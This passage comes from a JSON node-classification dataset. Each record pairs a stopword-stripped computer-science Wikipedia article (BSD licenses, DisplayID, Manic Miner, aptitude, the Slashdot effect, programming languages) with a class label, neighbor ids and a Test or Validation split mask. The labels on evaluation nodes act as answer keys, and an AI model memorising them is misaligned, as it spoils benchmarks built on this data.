      5475,
      3172,
      7525,
      10213,
      3181,
      1519,
      2671,
      9456,
      7794,
      3315,
      6648,
      11642,
      9469,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9320,
    "label": 2,
    "text": "BSD_licenses:bsd licenses bsd licenses family permissive free software licenses imposing minimal restrictions use distribution covered software contrast copyleft licenses share-alike requirements original bsd license used namesake berkeley software distribution bsd unix-like operating system original version since revised descendants referred modified bsd licenses bsd license class license generally referred bsd-like modified bsd license wide use today similar license originally used bsd version unix bsd license simple license merely requires code retain bsd license notice redistributed source code format reproduce notice redistributed binary format bsd license unlike licenses require source code distributed addition original 4-clause license used bsd several derivative licenses emerged also commonly referred bsd license today typical bsd license 3-clause version revised original 4-clause version bsd licenses following codice_1 organization codice_2 codice_2 codice_4 year copyright published bsd codice_2 regents university california codice_1 university california berkeley releases bsd prior adoption 4-clause bsd license used license clearly ancestral 4-clause bsd license releases include 4.3bsd-tahoe 1988 net/1 1989 although largely replaced 4-clause license license found 4.3bsd-reno net/2 4.4bsd-alpha original bsd license contained clause found later licenses known advertising clause clause eventually became controversial required authors works deriving bsd-licensed work include acknowledgment original source advertising material clause number 3 original license text clause objected grounds people changed license reflect name organization led escalating advertising requirements programs combined together software distribution every occurrence license different name required separate acknowledgment arguing richard stallman stated counted 75 acknowledgments 1997 version netbsd addition clause presented legal problem wishing publish bsd-licensed software relies upon separate programs using gnu gpl advertising clause incompatible gpl allow addition restrictions beyond already imposes gpl publisher free software foundation recommends developers use license though states reason use software already using today original license sometimes called bsd-old 4-clause bsd advertising clause removed license text official bsd william hoskins director office technology licensing uc berkeley bsd distributions removed clause many similar clauses remain bsd-derived code sources unrelated code using derived license original license sometimes referred bsd-old resulting 3-clause version sometimes referred bsd-new names include new bsd revised bsd bsd-3 3-clause bsd version vetted open source license osi bsd license free software foundation refers license modified bsd license states compatible gnu gpl fsf encourages users specific referring license name i.e simply referring bsd license bsd-style avoid confusion original bsd license version allows unlimited redistribution purpose long copyright notices license disclaimers warranty maintained license also contains clause restricting use names contributors endorsement derived work without specific permission even simplified version come use primarily known usage freebsd use early april 29 1999 likely well primary difference new bsd 3-clause license omits non-endorsement clause also adds disclaimer views opinions expressed software free software foundation refers license freebsd license states compatible gnu gpl addition fsf encourages users specific referring license name i.e simply referring bsd license bsd-style modified/new bsd license avoid confusion original bsd license projects netbsd use similar 2-clause license without additional disclaimer version vetted open source license osi simplified bsd license isc license functionally equivalent endorsed openbsd project license template new contributions formerly known free public license 1.0.0 bsd 0-clause license spdx 0bsd goes 2-clause license dropping requirements include copyright notice license text disclaimer either source binary forms freebsd project argues advantages bsd-style licenses companies commercial use-cases due license compatibility proprietary licenses general flexibility stating bsd-style licenses place minimal restrictions future behavior n't legal time-bombs unlike copyleft licenses bsd license allows proprietary use allows software released license incorporated proprietary products works based material may released proprietary license closed source software allowing usual commercial usages 3-clause bsd license like permissive licenses compatible almost foss licenses well proprietary licenses two variants license new bsd license/modified bsd license 3-clause simplified bsd license/freebsd license 2-clause verified gpl-compatible free software licenses free software foundation vetted open source licenses open source initiative original 4-clause bsd license accepted open source license although original considered free software license fsf fsf consider compatible gpl due advertising clause bsd license family one oldest broadly used license family foss ecosystem also many new licenses derived inspired bsd licenses many foss software projects use bsd license instance bsd os family freebsd etc google bionic toybox bsd 3-clause license ranked popularity number five according black duck software sixth according github data",
    "neighbors": [
      10752,
      7684,
      10761,
      9738,
      1036,
      2061,
      8718,
      9743,
      10255,
      7185,
      8725,
      4636,
      9245,
      5663,
      3618,
      546,
      1574,
      1064,
      3114,
      10284,
      5677,
      7223,
      1080,
      2105,
      5177,
      9783,
      10813,
      6718,
      6207,
      3651,
      7748,
      2117,
      3654,
      5703,
      9798,
      8266,
      1101,
      8781,
      10317,
      10831,
      9815,
      7769,
      9306,
      3676,
      607,
      4192,
      9827,
      10851,
      8295,
      8810,
      5228,
      1646,
      10352,
      5747,
      633,
      4729,
      8316,
      7810,
      132,
      6276,
      4745,
      4607,
      8846,
      11406,
      6800,
      11418,
      3229,
      5283,
      3237,
      10917,
      1191,
      4777,
      10921,
      5803,
      684,
      4781,
      11439,
      2224,
      1203,
      692,
      3763,
      1718,
      4277,
      7347,
      4793,
      8378,
      2236,
      6333,
      6338,
      10436,
      1221,
      9927,
      6345,
      8395,
      7373,
      4302,
      8909,
      6352,
      1747,
      5335,
      6361,
      10971,
      3296,
      737,
      2786,
      6369,
      9444,
      9953,
      4841,
      6890,
      7913,
      9452,
      237,
      2798,
      2287,
      11506,
      7924,
      5369,
      4349,
      6910,
      9471,
      11017,
      9996,
      4369,
      11028,
      5397,
      2331,
      11552,
      8994,
      8995,
      292,
      1316,
      295,
      8487,
      4908,
      3885,
      7980,
      1839,
      2864,
      7983,
      11573,
      3382,
      823,
      8504,
      1849,
      4409,
      7999,
      2368,
      1859,
      6979,
      10565,
      3399,
      11259,
      11083,
      1358,
      850,
      11098,
      10088,
      873,
      8041,
      8554,
      9580,
      7022,
      1399,
      11644,
      10623,
      7552,
      3969,
      5506,
      8582,
      1927,
      10631,
      7561,
      394,
      7562,
      9616,
      9107,
      916,
      9625,
      1435,
      5534,
      4001,
      2978,
      5028,
      11689,
      4011,
      2990,
      9135,
      11184,
      9141,
      2488,
      11193,
      9151,
      10687,
      9153,
      8644,
      7626,
      2000,
      4048,
      4561,
      6098,
      8147,
      4053,
      3030,
      11218,
      11221,
      5593,
      10202,
      6622,
      3551,
      7139,
      487,
      9192,
      7148,
      10732,
      8177,
      2550,
      6137,
      3578,
      1019,
      2047
    ],
    "mask": "Test"
  },
  {
    "node_id": 9321,
    "label": 3,
    "text": "DisplayID:displayid displayid vesa standard metadata describing display device capabilities video source designed replace e-edid standard edid structure v1.4 displayid standard initially released december 2007 version 1.1 released march 2009 followed version 1.2 released august 2011 version 1.3 released june 2013 current version 2.0 released september 2017 displayid uses variable-length structures 256 bytes encompass existing edid extensions well new extensions 3d displays embedded displays wide color gamut hdr eotf displayid format includes several blocks describe logical parts display video interfaces display device technology timing details manufacturer information data blocks identified unique tag length block variable fixed specific number bytes base data block mandatory extension blocks optional variable structure based cea edid extension block version 3 first defined cea-861-b displayid standard freely available royalty-free implement version 2.0 introduces new generalized information blocks primarily intended ultrahd high dynamic range hdr displays lcd computer monitors lcd/oled televisions native support bt.2020 color space pq/hlg transfer functions also makes optional predefined crt/lcd timings dmt cea-861 standards switching formula-based structures follow vesa cvt-rb gtf base displayid 2.0 variable-length structure data blocks data block starts mandatory block tag revision number 0-7 payload length 0-248 bytes variable length 251 bytes following blocks currently defined codice_1 product identification block contains standard vendor product ids serial number date manufacture product name comparing legacy block codice_2 microsoft isa plug play identifier replaced ieee oui first used network mac address codice_3 display parameters block contains basic parameters viewable area size pixel count supported color depth factory calibrated rgb color space white point luminance gamma transfer function comparing legacy block codice_4 color calibration values moved block codice_5 max/min luminance values added display size specified 1 mm increments addition default 0.1 mm codice_6 detailed timing block type vii defines cta-861 compatible timings based pixel rate block based type vi block codice_7 codice_8 type viii enumerated timing code block based type iv dmt id block codice_9 provides one-byte two-byte video mode codes defined vesa display monitor timings standard video information codes defined cta-861 hdmi codice_10 type ix formula-based timings block based type v short timings block codice_11 codice_12 dynamic video timing range block based block codice_13 video timing range limits new version allows precise definition pixel rate 1 khz steps adds indication variable refresh rates codice_14 display interface features block describes color depth dynamic range transfer function supported display controller based blocks codice_15 display interface features codice_5 color characteristics codice_17 stereo display interface block based block codice_18and describes stereoscopic 3d/vr modes i.e timings codes stereo frame formats supported display codice_19 tiled display topology block describes displays consist multiple physical display panels driven separate video interface based block codice_20 codice_21 container id block defines unique identifier used associate additional devices may present multifunctional display codice_22 vendor-specific data includes proprietary parameters supported displayid 2.0 structures codice_23 cta displayid block provides information cta-861 edid timings version 1.3 information blocks 0x10-0x1f borrow heavily edid 1.4 standard designed previous generation crt/lcd/dlp/pdp displays following block types defined note indicated difference similar/superseding structures version 2.0 shown sections codice_2 product identification superseded codice_1 difference codice_4 display parameters superseded codice_3 differences codice_5 color characteristics superseded codice_3 display parameters codice_30 type detailed timings superseded codice_6 type vii detailed timings differences codice_32 type ii detailed timings block provides compressed structure less precise pixel coordinates reduced blank intervals comparing type codice_33 type iii short timings block provides short compressed structure uses formula-based cvt timings codice_9 type iv short timing dmt id code block uses video mode codes defined vesa display monitor timings standard well video information codes defined cta-861 hdmi superseded codice_8 enumerated timing codice_11 type v short timings block based type iii short timings block 0x05 provides greater pixel precision supports cvt-rb superseded codice_10 type ix formula-based timings codice_7 type vi detailed timing block supports higher precision pixel clock high-resolution timings block based type block 0x03 allows greater timings precision using 1 khz steps instead 10 khz superseded codice_6 type vii detailed timings codice_40 video timing range limits block describes displays capable variable timings superseded codice_12 dynamic video timings range codice_42 display device data block provides information display panel characteristics embedded applications display technology panel type pixel response times display interface features block superseded codice_14 display interface features data blocks described codice_44 serial number data block provides product serial number ascii string codice_45 general purpose ascii string block provides general purpose text strings may required specific applications codice_46 interface power sequencing block defines display interface signal timings required entering exiting sleep mode codice_47 transfer characteristics block defines detailed gamma curves according vesa display transfer characteristic data block dtcdb standard may required byte 1 codice_5 color characteristics block codice_18 stereo display interface block describes stereoscopic 3d/vr modes superseded codice_17 stereo display interface codice_20 tiled display topology data block defines multi-panel displays superseded codice_19 tiled display topology codice_53 vendor specific block defines proprietary vendor data",
    "neighbors": [
      9057,
      3548,
      11631,
      4567
    ],
    "mask": "Test"
  },
  {
    "node_id": 9322,
    "label": 3,
    "text": "Manic_Miner:manic miner manic miner platform video game originally written zx spectrum matthew smith released bug-byte 1983 later re-released software projects first game miner willy series among early titles platform game genre game inspired atari 8-bit family game miner 2049er since ported numerous home computers video game consoles mobile phones time stand-out features included in-game music sound effects high replay value colourful graphics well designed graphical limitations zx spectrum spectrum video display allowed background foreground colours exchanged automatically without software attention animated load screen appears swap words manic miner manipulation feature spectrum first game in-game music playing required constant cpu attention thought impossible achieved constantly alternating cpu time music game results music stuttery rhythm in-game music hall mountain king edvard grieg music henrik ibsen play peer gynt music plays title screen arrangement blue danube twenty caverns one screen size several flashing objects player must collect willy oxygen supply runs player collected objects one cavern must go now-flashing portal take next cavern player must avoid enemies listed cassette inlay ... poisonous pansies spiders slime worst manic mining robots ... move along predefined paths constant speeds willy also killed falling far players must time precision jumps movements prevent falls collisions enemies extra lives gained every 10,000 points game ends player either lives left completes twenty caverns escapes open air final portal garden right house white picket fence red car parked front left slope leading backyard pond tree white animal resembling cat mouse watches sun set behind pond upon gaining freedom miner willy simply walks right screen never looking back differences bug-byte software projects versions scroll-text attract mode different reflect new copyright also several cosmetic changes although gameplay remains manic miner placed number 25 sinclair official top 100 spectrum games time voted number 6 readers top 100 games time issue winner golden joystick award best arcade style game computer video games magazine march 1983 edition placed third game year 1983 competition game included 97 polygon 500 best games time list official ports exist commodore 64 commodore 16 amstrad cpc bbc micro dragon 32/64 commodore amiga oric 1 game boy advance msx sam coupé mobile phones unofficial ports exist ibm pc compatibles windows dos linux apple macintosh atari st zx81 trs-80 color computer sony playstation nintendo 64 neo geo pocket color acorn archimedes orao z88 pmd 85 hp48 microsoft zune acorn atom commodore 128 sam coupé version programmed matthew holt like zx original requires pixel-perfect timing graphics audio latter františek fuka greatly updated addition original twenty caverns forty additional caverns included release levels designed david ledbury winners competition run sam computers ltd although sam coupé broadly spectrum clone avoided spectrum original limitations colour graphics spectrum pixels could many colours 8 horizontally adjacent pixels within span character block one two colours manic miner port made use removal restriction detailed use colour visibly character sprites version scored 84 sinclair 88 crash game ported czechoslovak computers pmd 85 1985 authors pmd 85 version vít libovický daniel jenne made accurate could bbc micro version solar power generator instead containing completely different room called meteor shower reflecting machines solar power generator beam light instead meteors descend top screen disintegrate hit platforms like skylabs skylab landing bay also forcefields turn layout completely different also last screen still called final barrier complex difficult unlike spectrum version considered fairly easy completely different layout also features blinking forcefields amstrad version effectively spectrum version software projects except eugene lair renamed eugene layout final barrier completely different similar spectrum version bbc version dragon 32 version programmed roy coates two extra rooms i.e 22 altogether cheat mode accessed typing p p penguin retain resolution original dragon version used pmode 4 black/white mode z88 port functionality cheats bug-byte software projects versions levels even background music hp 48 series version somewhat limited low resolution screen size scrolling area rather displaying level whole makes difficult port previously mastered another version otherwise fairly loyal zx spectrum version sound somewhat different sounding colour omitted obvious hardware reasons game play remains similar despite awkward platform commodore 16 version limited number respects mainly due initial lack developer material c16 machine two-week deadline produce test game generate master tape duplication house issues related lack fast loader system c16 cassette deck result took seven minutes game load bug resulted game entering first screen soon tape finished loading instead waiting user start game issues related lack music game sound way video memory mapped c16 resulted number screens removed load time video mapping could correctly handled version game released xbox 360 xbox live indie game name manic miner 360 21st june 2012 sequel manic miner jet set willy followed jet set willy ii software projects also released game style manic miner commodore vic-20 called perils willy addition quite unofficial sequels remakes homages updates released even day including zx81 version homage loading screen appeared one episode 2005 british sitcom nathan barley",
    "neighbors": [
      4973,
      6797,
      823,
      7536,
      9006,
      10862,
      10931,
      1527,
      8415
    ],
    "mask": "Test"
  },
  {
    "node_id": 9323,
    "label": 9,
    "text": "StepTalk:steptalk steptalk official gnustep scripting language framework represents separate scriptable servers applications single object environment meant independent programming language used default language smalltalk running objective-c runtime steptalk ported mac os x goal steptalk provide environment gluing applications together provide framework communication users objects applications major goals default scripting language steptalk smalltalk smalltalk simple language easy learn basic principles user must know able use language similar natural language smalltalk uses similar approach objective-c language used gnustep steptalk works platform gnustep works ports native macos cocoa framework developed various contributors",
    "neighbors": [
      5409,
      9345,
      10470,
      11625,
      7983,
      8303,
      8304,
      9780,
      1112,
      3323,
      862,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 9324,
    "label": 2,
    "text": "Aptitude_(software):aptitude software aptitude front-end apt debian package manager displays list software packages allows user interactively pick packages install remove especially powerful search system utilizing flexible search patterns initially created debian appeared rpm package manager rpm based distributions well conectiva aptitude based ncurses computer terminal library provides interface incorporates elements commonly seen graphical user interfaces guis pull-down menus addition ncurses interface aptitude provides extensive command-line interface cli even though aptitude one executable file provides command-line functions similar apt- family tools apt-get apt-cache apt-listchanges etc. aptitude also emulates apt-get command-line arguments allowing act full replacement apt-get past recommended aptitude apt-get used interchangeably longer true programs correctly track share common list packages automatically installed satisfy dependencies aptitude created 1999 time two terminal-based apt-like front-ends available dselect program used manage packages debian since apt created console-apt program project considered heir apparent dselect aptitude created experiment object-oriented programming design used console-apt hope would result flexible program broader set features first public release aptitude version 0.0.1 november 18 1999 limited ability view list available packages could actually download install packages version 0.0.4a ability added many improvements version included debian 2.2 code name potato late 2000 whole user interface module rewritten new architecture created based libsigc++ callback library concepts modern widget toolkits gtk+ qt enabled interface become much similar guis previously features pull-down menus pop-up dialogs one aptitude unusual features tiny implementation minesweeper added time first official aptitude release following rewrite 0.2.0. aptitude 0.2.11.1 released debian 3.0 woody time console-apt project renamed deity effectively abandoned maintainers removed woody aptitude also ported jailbroken ios part cydia package manager aptitude states unlike advanced packaging tool super cow powers apt-get super cow powers found issuing command apt-get moo however aptitude issuing moo give user prompt saying easter eggs however issuing aptitude -v moo aptitude -vv moo user see series statements denying super cow powers telling go away ending picture reference antoine de saint-exupéry little prince unlike original apt-get easter egg different versions program different sequences addition package description states aptitude also y2k-compliant non-fattening naturally cleansing housebroken",
    "neighbors": [
      10760,
      7181,
      7188,
      8213,
      8727,
      6680,
      4123,
      5670,
      3131,
      3649,
      10817,
      3654,
      1107,
      3667,
      6227,
      4192,
      3685,
      6257,
      1138,
      5755,
      7293,
      2180,
      11410,
      10900,
      6301,
      4775,
      7847,
      6828,
      3245,
      5819,
      190,
      2239,
      9407,
      6361,
      741,
      231,
      7913,
      7920,
      9971,
      2804,
      6393,
      5369,
      11525,
      2310,
      7435,
      7947,
      9487,
      788,
      1813,
      8476,
      6445,
      6446,
      7983,
      1842,
      823,
      2872,
      5962,
      3918,
      4951,
      9564,
      2401,
      1379,
      5990,
      9063,
      7020,
      10096,
      2930,
      7027,
      1396,
      9074,
      2955,
      2448,
      11669,
      926,
      8112,
      439,
      6583,
      10172,
      10687,
      9671,
      5067,
      463,
      975,
      2010,
      3550,
      7140,
      6119,
      5096,
      8177,
      1522,
      3068,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 9325,
    "label": 4,
    "text": "Slashdot_effect:slashdot effect slashdot effect also known slashdotting occurs popular website links smaller website causing massive increase traffic overloads smaller site causing slow even temporarily become unavailable name stems huge influx web traffic would result technology news site slashdot linking websites original circumstances changed flash crowds slashdot reported 2005 diminishing due competition similar sites general adoption elastically scalable cloud hosting platforms effect associated websites metablogs fark digg drudge report imgur reddit twitter leading terms farked drudged reddit effect —or receiving hug death site question google doodles link search results doodle topic also result high increases traffic search results page typically less robust sites unable cope huge increase traffic become unavailable – common causes lack sufficient data bandwidth servers fail cope high number requests traffic quotas sites maintained shared hosting services often fail confronted slashdot effect flash crowd generic term without using specific name describes network phenomenon network host suddenly receives lot traffic sometimes due appearance website blog news column according jargon file term slashdot effect refers phenomenon website becoming virtually unreachable many people hitting site mentioned interesting article popular slashdot news service later extended describe similar effect listed popular site similar generic term flash crowd appropriate term term flash crowd coined 1973 larry niven science fiction short story flash crowd predicted consequence inexpensive teleportation would huge crowds materializing almost instantly sites interesting news stories twenty years later term became commonly used internet describe exponential spikes website server usage passes certain threshold popular interest effect anticipated years earlier 1956 alfred bester novel stars destination reddit effect also used describe viral crowd fundraising efforts addition surge web traffic sites slashdot digg reddit stumbleupon fark consist brief submitted stories self-moderated discussion story typical submission introduces news item website interest linking response large masses readers tend simultaneously rush view referenced sites ensuing flood page requests readers exceed site available bandwidth ability servers respond render site temporarily unreachable major news sites corporate websites typically engineered serve large numbers requests therefore normally exhibit effect websites fall victim may hosted home servers offer large images movie files inefficiently generated dynamic content e.g many database hits every web hit even web hits requesting page websites often became unavailable within minutes story appearance even comments posted occasionally paying slashdot subscribers access stories non-paying users rendered site unavailable even story posted general readership definitive numbers exist regarding precise magnitude slashdot effect estimates put peak mass influx page requests anywhere several hundred several thousand hits per minute flood usually peaked article top site front page gradually subsided story superseded newer items traffic usually remained elevated levels article pushed front page could take 12 18 hours initial posting however articles significantly longer lifetimes due popularity newsworthiness interest linked article 2005 reporters commenting slashdot effect diminishing however effect seen involving twitter popular users mention website targeted website community-based structure term also refer secondary effect large group new users suddenly set accounts start participate community cases considered good thing others viewed disdain prior members quite often sheer number new people brings many unwanted aspects slashdot along trolling vandalism newbie-like behavior bears similarity 1990s usenet concept eternal september many solutions proposed sites deal slashdot effect several systems automatically mirror slashdot-linked pages ensure content remains available even original site becomes unresponsive sites process slashdotted may able mitigate effect temporarily redirecting requests targeted pages one mirrors slashdot mirror sites links servers endorse third party solution mirroring content may constitute breach copyright many cases cause ad revenue lost targeted site",
    "neighbors": [
      7488,
      225,
      3428,
      8582,
      3688,
      2409,
      11274,
      10126,
      4725,
      3350,
      119,
      6550,
      11674,
      1723,
      2076,
      10270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9326,
    "label": 4,
    "text": "Penelope_Endersby:penelope endersby penelope penny endersby british researcher academic specialising armour explosives appointed chief executive met office december 2018 prior led cyber information systems defence science technology laboratory endersby grew north london educated haberdashers aske school girls elstree studied natural sciences university cambridge member newnham college remains associate newnham became interested materials science metallurgy sponsored british gas researching fuel cells graduating joined royal armament research development establishment 1993 endersby researcher specialising armour explosives served royal armament research development establishment becoming uk expert electric intelligent armours appointed department manager defence science technology laboratory 2009 began focus c4isr cyber security holds royal academy engineering visiting professorship university southampton endersby made division head cyber information systems division defence science technology laboratory 2015 involved international women day celebrations joined council institute physics 2017 endersby appointed chief executive met office december 2018 first woman fill role serves board ploughshare innovations ministry defence united kingdom technology transfer office endersby expert choir singer two children interested wildlife records uk phenology trustee wiltshire wildlife trust",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9327,
    "label": 0,
    "text": "Aikuma:aikuma aikuma android app collecting speech recordings time-aligned translations app includes text-free interface consecutive interpretation designed users literate aikuma grand prize open source software world challenge 2013 aikuma means meeting place usarufa papuan language software first used 2012 aikuma developed sponsorship national science foundation including 101,501 us project use mobile telephones collect larger amounts data undocumented endangered languages would never possible usual fieldwork aikuma modified version lig-aikuma used collecting substantial quantities audio remote indigenous villages modified version app called lig-aikuma developed université grenoble alpes lig laboratory implements new features elicitation speech text images videos",
    "neighbors": [
      1890,
      5677,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9328,
    "label": 2,
    "text": "Smart_tag_(Microsoft):smart tag microsoft smart tags early selection-based search feature found later versions microsoft word beta versions internet explorer 6 web browser application recognizes certain words types data converts hyperlink also included microsoft office programs well visual web developer selection-based search allows user invoke online service page using mouse microsoft initially intended technology built windows xp operating system changed plans due public criticism smart tags integrated instances user might benefit added formatting assistance part microsoft control technology presented special shortcut menu listing options paste autocorrect date person name addresses among others flag entered information accordingly smart tags work actions recognizers latter checks whether information entered user included list smart tag terms action associated executed accessed dedicated smart tag button smart tags enabled microsoft word attempts recognize certain types data document example dates names automatically makes text smart tag visually indicated purple dotted underline clicking smart tag selection-based search command bring list possible actions data type example microsoft word words john smith would recognized personal name smart tagged list actions available clicked might open contact schedule meeting add contacts insert address word version 2010 smart tag auto-recognition person name smart tag features longer available within web browser smart tag technology passes way web page underlines words pre-programmed react inserts hyperlinks selecting smart tag like many selection-based search commands involved hover followed mouse click keyboard commands required invoke search click takes destination specified smart tag developer without knowledge permission web site proprietor early tests almost links offered sites products microsoft affiliates smart tags also generated third parties example company might contract technology firm develop set smart tags actions specific products services product names automatically recognized linked actions check quantity stock check price security vendors feared smart tags could used propagating viruses user tracking data collection purposes might violate user privacy another concern could used negative harmful ways linking political candidate name website negative advertising sites response criticism microsoft removed technology windows xp operating system made feature could turned ie office xp however microsoft revisited concept smart tags later versions internet explorer 8 implemented selection-based search feature called internet explorer 8 accelerators unlike smarttags feature automatically parsed page looking text interest accelerators relied upon user select text accelerator applied accelerators interface open developers accelerators included default use microsoft affiliates products could replaced within category another provider desired smart tags also included email sms text messages windows phone example dates email messages automatically recognized tapped opens window allows appointment created date field already filled",
    "neighbors": [
      5765,
      11144,
      9609,
      7690,
      2059,
      6028,
      790,
      6171,
      7713,
      11683,
      10026,
      10282,
      10029,
      7983,
      11060,
      440,
      10808,
      2632,
      460,
      9167,
      9808,
      11223,
      8281,
      2777,
      603,
      7523,
      1904,
      5619,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 9329,
    "label": 2,
    "text": "Tom_Rolander:tom rolander thomas alan rolander american entrepreneur engineer developer multitasking multiuser operating system mp/m created microcomputers 1979 working first employee digital research gary kildall father cp/m cp/m mp/m laid groundwork later digital research operating system families concurrent cp/m concurrent dos multiuser dos also developed cp/net 2013 granted 2013 diamond award entrepreneurial excellence university washington uw",
    "neighbors": [
      10113,
      6921,
      8075,
      3216,
      2840,
      2201,
      2729,
      7849,
      11562,
      7983,
      178,
      4409,
      7999,
      4548,
      10067,
      10083,
      5220,
      2672,
      3056,
      4337,
      9332,
      4727,
      11513,
      6778
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9330,
    "label": 9,
    "text": "High-level_programming_language:high-level programming language computer science high-level programming language programming language strong abstraction details computer contrast low-level programming languages may use natural language elements easier use may automate even hide entirely significant areas computing systems e.g memory management making process developing program simpler understandable using lower-level language amount abstraction provided defines high-level programming language 1960s high-level programming languages using compiler commonly called autocodes examples autocodes cobol fortran first high-level programming language designed computers plankalkül created konrad zuse however implemented time original contributions largely isolated developments due world war ii aside language influence superplan language heinz rutishauser also degree algol first significantly widespread high-level language fortran machine-independent development ibm earlier autocode systems algol defined 1958 1960 committees european american computer scientists introduced recursion well nested functions lexical scope also first language clear distinction value name-parameters corresponding semantics algol also introduced several structured programming concepts while-do if-then-else constructs syntax first described formal notation – backus–naur form bnf roughly period cobol introduced records also called structs lisp introduced fully general lambda abstraction programming language first time high-level language refers higher level abstraction machine language rather dealing registers memory addresses call stacks high-level languages deal variables arrays objects complex arithmetic boolean expressions subroutines functions loops threads locks abstract computer science concepts focus usability optimal program efficiency unlike low-level assembly languages high-level languages language elements translate directly machine native opcodes features string handling routines object-oriented language features file input/output may also present one thing note high-level programming languages languages allow programmer detached separated machine unlike low-level languages like assembly machine language high-level programming amplify programmer instructions trigger lot data movements background without knowledge responsibility power executing instructions handed machine programmer high-level languages intend provide features standardize common tasks permit rich debugging maintain architectural agnosticism low-level languages often produce efficient code optimization specific system architecture abstraction penalty cost high-level programming techniques pay unable optimize performance use certain hardware n't take advantage certain low-level architectural resources high-level programming exhibits features like generic data structures operations run-time interpretation intermediate code files often result execution far operations necessary higher memory consumption larger binary program size reason code needs run particularly quickly efficiently may require use lower-level language even higher-level language would make coding easier many cases critical portions program mostly high-level language hand-coded assembly language leading much faster efficient simply reliably functioning optimised program however growing complexity modern microprocessor architectures well-designed compilers high-level languages frequently produce code comparable efficiency low-level programmers produce hand higher abstraction may allow powerful techniques providing better overall results low-level counterparts particular settings high-level languages designed independent specific computing system architecture facilitates executing program written language computing system compatible support interpreted jit program high-level languages improved designers develop improvements cases new high-level languages evolve one others goal aggregating popular constructs new improved features example scala maintains backward compatibility java means programs libraries written java continue usable even programming shop switches scala makes transition easier lifespan high-level coding indefinite contrast low-level programs rarely survive beyond system architecture written without major revision engineering 'trade-off 'abstraction penalty examples high-level programming languages active use today include python visual basic delphi perl php ecmascript ruby c java many others terms high-level low-level inherently relative decades ago c language similar languages often considered high-level supported concepts expression evaluation parameterised recursive functions data types structures assembly language considered low-level today many programmers might refer c low-level lacks large runtime-system garbage collection etc basically supports scalar operations provides direct memory addressing therefore readily blends assembly language machine level cpus microcontrollers assembly language may regarded higher level often still one-to-one used without macros representation machine code supports concepts constants limited expressions sometimes even variables procedures data structures machine code turn inherently slightly higher level microcode micro-operations used internally many processors three general modes execution modern high-level languages note languages strictly interpreted languages compiled languages rather implementations language behavior use interpreting compiling example algol 60 fortran interpreted even though typically compiled similarly java shows difficulty trying apply labels languages rather implementations java compiled bytecode executed either interpreting java virtual machine jvm compiling typically just-in-time compiler hotspot jvm moreover compiling transcompiling interpreting strictly limited description compiler artifact binary executable il assembly alternatively possible high-level language directly implemented computer – computer directly executes hll code known high-level language computer architecture – computer architecture designed targeted specific high-level language burroughs large systems target machines algol 60 example",
    "neighbors": [
      512,
      5634,
      3587,
      7684,
      7173,
      9224,
      3594,
      4107,
      5651,
      4121,
      3613,
      9245,
      547,
      556,
      5677,
      10796,
      5680,
      9780,
      1591,
      2105,
      6718,
      10819,
      8262,
      5703,
      1610,
      9804,
      2638,
      9331,
      3705,
      9345,
      2691,
      3716,
      10387,
      8854,
      4770,
      1702,
      4777,
      682,
      9391,
      692,
      191,
      5312,
      1219,
      9926,
      9932,
      5845,
      11488,
      7395,
      10469,
      4838,
      7398,
      10983,
      5355,
      5872,
      242,
      10488,
      7421,
      2304,
      8454,
      5395,
      10012,
      5415,
      10537,
      305,
      1841,
      10040,
      4410,
      5946,
      10044,
      10560,
      10568,
      8524,
      847,
      5456,
      3414,
      10584,
      348,
      6502,
      4968,
      10089,
      8554,
      7531,
      11625,
      372,
      5492,
      3960,
      1923,
      4483,
      3462,
      8582,
      8079,
      6036,
      8598,
      5527,
      9626,
      1952,
      8609,
      11688,
      428,
      5040,
      8627,
      1976,
      4030,
      4548,
      8644,
      4042,
      11212,
      10703,
      5585,
      2002,
      477,
      7646,
      10720,
      9707,
      9714,
      7158,
      3067,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9331,
    "label": 9,
    "text": "Low-level_programming_language:low-level programming language low-level programming language programming language provides little abstraction computer instruction set architecture—commands functions language map closely processor instructions generally refers either machine code assembly language word low refers small nonexistent amount abstraction language machine language low-level languages sometimes described close hardware programs written low-level languages tend relatively non-portable low-level languages convert machine code without compiler interpreter – second-generation programming languages use simpler processor called assembler – resulting code runs directly processor program written low-level language made run quickly small memory footprint equivalent program high-level language less efficient use memory low-level languages simple considered difficult use due numerous technical details programmer must remember comparison high-level programming language isolates execution semantics computer architecture specification program simplifies development low-level programming languages sometimes divided two categories first generation second generation machine code language computer process directly without previous transformation currently programmers almost never write programs directly machine code requires attention numerous details high-level language handles automatically furthermore requires memorizing looking numerical codes every instruction extremely difficult modify true machine code stream raw usually binary data programmer coding machine code normally codes instructions data readable form decimal octal hexadecimal translated internal format program called loader toggled computer memory front panel although programs written machine language programmers often become adept reading working core dumps debugging front panel example function hexadecimal representation 32-bit x86 machine code calculate n th fibonacci number second-generation languages provide one abstraction level top machine code early days coding computers like tx-0 pdp-1 first thing mit hackers write assemblers assembly language little semantics formal specification mapping human-readable symbols including symbolic addresses opcodes addresses numeric constants strings typically one machine instruction represented one line assembly code assemblers produce object files link object files loaded assemblers provide macros generate common sequences instructions example fibonacci number calculator x86 assembly language using masm syntax code example hardware features x86 processor registers named manipulated directly function loads input precise location stack 8 bytes higher location stored esp stack pointer performs calculation manipulating values eax ebx ecx edx registers finished returns note assembly language concept returning value result stored eax register ret command simply moves code processing code location stored stack usually instruction immediately one called function author calling code know function stores result eax retrieve x86 assembly language imposes standard returning values function fact concept function calling code examine state procedure returns needs extract value compare function c code similar structure assembly language example significant differences terms abstraction abstractions make c code compilable without modification architecture c compiler written x86 assembly language code specific x86 architecture late 1960s high-level languages pl/s bliss bcpl extended algol burroughs large systems c included degree access low-level programming functions one method inline assembly assembly code embedded high-level language supports feature languages also allow architecture-dependent compiler optimization directives adjust way compiler uses target processor architecture",
    "neighbors": [
      512,
      9345,
      2691,
      3587,
      8454,
      8966,
      6664,
      9224,
      9739,
      9996,
      5395,
      5651,
      5527,
      9626,
      3613,
      1952,
      5793,
      4770,
      10145,
      1702,
      5415,
      7462,
      5165,
      5677,
      5040,
      5680,
      9780,
      1591,
      9911,
      10680,
      3386,
